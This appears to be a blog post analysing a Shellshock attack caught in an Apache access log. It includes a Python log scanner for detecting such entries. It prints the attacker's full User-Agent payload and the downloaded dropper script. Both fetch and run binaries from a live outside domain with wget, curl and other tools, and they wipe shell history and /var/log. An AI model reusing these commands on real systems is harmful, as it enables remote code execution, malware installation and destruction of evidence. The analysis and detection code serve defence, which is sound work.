Bash Vulnerability

Bash Vulnerability is a family of security bugs in the widely used Unix Bash shell. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

Here is a real-life example. In the Apache access log, the User-Agent header carries Linux shell commands:

185.125.32.54 - - [09/Aug/2016:18:02:52 +0300] "GET /cgi-bin/login HTTP/1.0" 403 0 "-" "() { :;}; /bin/bash -c \"mkdir /var/.udp; wget http://exe.ugotownedz.org/.udp/getbinaries.sh -O /tmp/upfile.sh;wget http://exe.ugotownedz.org/.udp/getbinaries.sh -O /tmp/upfile.sh;curl -o /tmp/upfile.sh http://exe.ugotownedz.org/.udp/getbinaries.sh;cd /tmp/; GET http://exe.ugotownedz.org/.udp/getbinaries.sh;fetch http://exe.ugotownedz.org/.udp/getbinaries.sh;lwp-download http://exe.ugotownedz.org/.udp/getbinaries.sh;mv /tmp/getbinaries.sh /tmp/upfile.sh ; cat /tmp/upfile.sh |grep -v 'echo d' >> /tmp/updo ; chmod +x /tmp/updo; chmod +x updo; sh /tmp/updo ;rm -rf /tmp/up*;rm -rf updo*; rm -rf /root/.bash_history; rm -rf /var/log/*\""

Looking at it first, we find the domain exe.ugotownedz.org, from which wget or the other Linux download tools in the payload try to fetch more code (getbinaries.sh).
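To find entries like this across a whole Apache access log, here is an added Python example (not from the original post) that parses combined-format lines, flags any request line, Referer or User-Agent carrying the "() {" Bash function-definition prefix that Shellshock relies on, and lists the download URLs and hosts in the payload for triage. The sample log lines are constructed, using documentation addresses and the placeholder domain dropper.example.

```python
import re
from urllib.parse import urlparse

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "user-agent".
# Apache writes an embedded double quote as \" so a quoted field is (?:[^"\\]|\\.)* not [^"]*.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) (\S+) ' + QUOTED + ' ' + QUOTED + '$')
# Shellshock trigger: a Bash function definition "() {" at the start of a header value,
# with optional whitespace between the parentheses and the brace.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')
URL_RE = re.compile(r'https?://[^\s"\'\\;|&<>]+')

def parse_line(line):
    """Split one combined-format line into fields; return None if it does not parse."""
    m = LOG_RE.match(line.rstrip('\n'))
    if not m:
        return None
    ip, when, request, status, size, referer, ua = m.groups()
    return {'ip': ip, 'time': when, 'request': request, 'status': status,
            'referer': referer, 'user_agent': ua}

def scan_log(lines):
    """One finding per line whose request, Referer or User-Agent carries a Shellshock
    payload, with the download URLs and hosts the payload references (triage IoCs)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not combined format (or a truncated line): skip rather than crash
        hit = [f for f in ('request', 'referer', 'user_agent') if SHELLSHOCK_RE.search(rec[f])]
        if not hit:
            continue
        urls = URL_RE.findall(' '.join(rec[f] for f in hit))
        findings.append({'ip': rec['ip'], 'time': rec['time'], 'status': rec['status'],
                         'fields': hit, 'urls': urls,
                         'hosts': sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})})
    return findings

# Constructed sample log (documentation addresses and a placeholder dropper domain); the
# second entry mirrors the shape of the access-log line quoted above.
SAMPLE_LOG = [
    '203.0.113.9 - - [09/Aug/2016:18:01:10 +0300] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Aug/2016:18:02:52 +0300] "GET /cgi-bin/login HTTP/1.0" 403 0 "-" '
    '"() { :;}; /bin/bash -c \\"wget http://dropper.example/.udp/getbinaries.sh -O /tmp/upfile.sh; '
    'curl -o /tmp/upfile.sh http://dropper.example/.udp/getbinaries.sh\\""',
    '198.51.100.8 - - [09/Aug/2016:18:05:00 +0300] "GET /cgi-bin/status HTTP/1.1" 200 10 '
    '"() { :;}; /bin/sh -c \\"id\\"" "curl/7.50"',
    'this line is not in combined format',
]
```

Run scan_log over the lines of a real access_log file; each finding gives the client IP, timestamp, response status, the header that carried the payload and the hosts to block or look up.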

A first look shows that the domain points to 4 servers, from which the bash script is downloaded.

#host exe.ugotownedz.org
exe.ugotownedz.org has address 96.35.170.54
exe.ugotownedz.org has address 110.10.178.146
exe.ugotownedz.org has address 177.39.141.197
exe.ugotownedz.org has address 189.28.176.35

Then we downloaded getbinaries.sh and looked inside the bash script:

mkdir /tmp/.udp
echo z1 >> /tmp/upfile
echo z2 >> /tmp/upfile
echo z3 >> /tmp/upfile
echo z4 >> /tmp/upfile
echo z5 >> /tmp/upfile
echo z6 >> /tmp/upfile
echo z7 >> /tmp/upfile
echo z8 >> /tmp/upfile
echo z9 >> /tmp/upfile
echo z10 >> /tmp/upfile
echo z11 >> /tmp/upfile
echo z12 >> /tmp/upfile
echo d2 >> /tmp/upfile
echo d3	>> /tmp/upfile
echo d4	>> /tmp/upfile
echo d5	>> /tmp/upfile
echo d6	>> /tmp/upfile
echo d7	>> /tmp/upfile
for file in $(cat /tmp/upfile); do killall $file; ls /tmp/.udp/$file || wget http://exe.ugotownedz.org/.udp/$file -O /tmp/.udp/$file; chmod +x /tmp/.udp/$file; /tmp/.udp/$file ; done
for file2 in $(cat /tmp/upfile); do killall $file2; cd /tmp/.udp; ls /tmp/.udp/$file2 || GET http://exe.ugotownedz.org/.udp/$file2; chmod +x $file2 ; /tmp/.udp/$file2 ; done
for file3 in $(cat /tmp/upfile); do killall $file3; cd /tmp/.udp; ls /tmp/.udp/$file3 || fetch http://exe.ugotownedz.org/.udp/$file3; chmod +x $file3 ; /tmp/.udp/$file3 ; done
for file4 in $(cat /tmp/upfile); do killall $file4; cd /tmp/.udp; ls /tmp/.udp/$file4 || lwp-download http://exe.ugotownedz.org/.udp/$file4; chmod +x $file4; /tmp/.udp/$file4 ; done
for file5 in $(cat /tmp/upfile); do killall $file5; cd /tmp/.udp; ls /tmp/.udp/$file5 || curl -o http://exe.ugotownedz.org/.udp/$file5; chmod +x $file5; /tmp/.udp/$file5 ; done
rm -rf /tmp/upfile
rm -rf /root/.bash_history

Then the injected command strips the d2, d3, d4, d5, d6 and d7 entries from the script (grep -v 'echo d'); we don't know why. After that it runs the downloaded binaries and removes itself and all logs to hide its tracks.

mv /tmp/getbinaries.sh /tmp/upfile.sh ; cat /tmp/upfile.sh |grep -v 'echo d' >> /tmp/updo ; chmod +x /tmp/updo; chmod +x updo; sh /tmp/updo ;rm -rf /tmp/up*;rm -rf updo*; rm -rf /root/.bash_history; rm -rf /var/log/*\"

Don't try to run this script, because the domain is still active and we don't know what these binaries do in a Linux environment. I don't have time at the moment to set up a sandbox and test these binaries!